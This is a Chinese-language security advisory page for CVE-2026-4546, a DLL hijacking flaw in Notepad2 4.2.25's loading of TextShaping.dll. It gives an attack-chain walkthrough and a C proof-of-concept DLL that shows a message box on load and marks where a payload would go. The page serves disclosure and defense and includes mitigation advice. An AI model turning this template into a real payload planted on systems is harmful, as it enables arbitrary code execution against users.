IPBUF安全漏洞报告
English
CVE-2026-4546 CVSS 7.0 高危

CVE-2026-4546 Notepad2 不受控搜索路径漏洞

披露日期: 2026-03-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4546
漏洞类型
不受控的搜索路径
CVSS评分
7.0 高危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Flos Freeware Notepad2

相关标签

不受控的搜索路径DLL劫持本地执行Notepad2CVE-2026-4546

漏洞概述

Flos Freeware Notepad2 4.2.25版本中的TextShaping.dll组件存在不受控的搜索路径漏洞。攻击者可通过本地执行恶意操作,利用该漏洞导致程序加载恶意文件,从而对系统的机密性、完整性和可用性造成高程度影响。

技术细节

该漏洞发生在Flos Freeware Notepad2的TextShaping.dll组件中,其根本原因是程序在加载动态链接库(DLL)时未能严格限制搜索路径,导致存在不受控的搜索路径漏洞。在Windows操作系统中,应用程序查找DLL的顺序通常包括应用程序目录、系统目录等。如果攻击者拥有本地低权限账户,并能够将恶意构造的TextShaping.dll文件放置在Notepad2的工作目录下,当用户运行Notepad2时,程序将优先加载该恶意DLL而非系统库。尽管该漏洞的利用复杂度较高,不需要用户交互,但攻击者必须具备在目标目录写入文件的能力。一旦利用成功,攻击者可获得与当前用户相同的权限,执行任意恶意代码,严重影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1
侦察
攻击者确认目标系统安装了Flos Freeware Notepad2 4.2.25。
STEP 2
文件植入
攻击者利用本地低权限,将恶意构造的TextShaping.dll文件放置在Notepad2的工作目录中。
STEP 3
触发加载
等待或诱导受害者启动Notepad2应用程序。
STEP 4
代码执行
Notepad2加载恶意DLL,执行攻击者预设的代码,导致系统被控。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2026-4546: Uncontrolled Search Path in TextShaping.dll // Compile as TextShaping.dll and place in Notepad2.exe directory #include <windows.h> // Export a dummy function to simulate the missing DLL interface __declspec(dllexport) void DummyExport() {} BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code execution starts here upon loading MessageBoxA(NULL, "CVE-2026-4546 Exploited: Malicious DLL Loaded!", "PoC", MB_OK | MB_ICONWARNING); // Payload execution would go here break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

影响范围

Flos Freeware Notepad2 4.2.25

防御指南

临时缓解措施
建议用户严格限制应用程序目录的写入权限,确保普通用户无法在Notepad2的根目录下放置文件。此外,应避免从不信任的网络位置运行该软件,并持续关注官方发布的修复更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表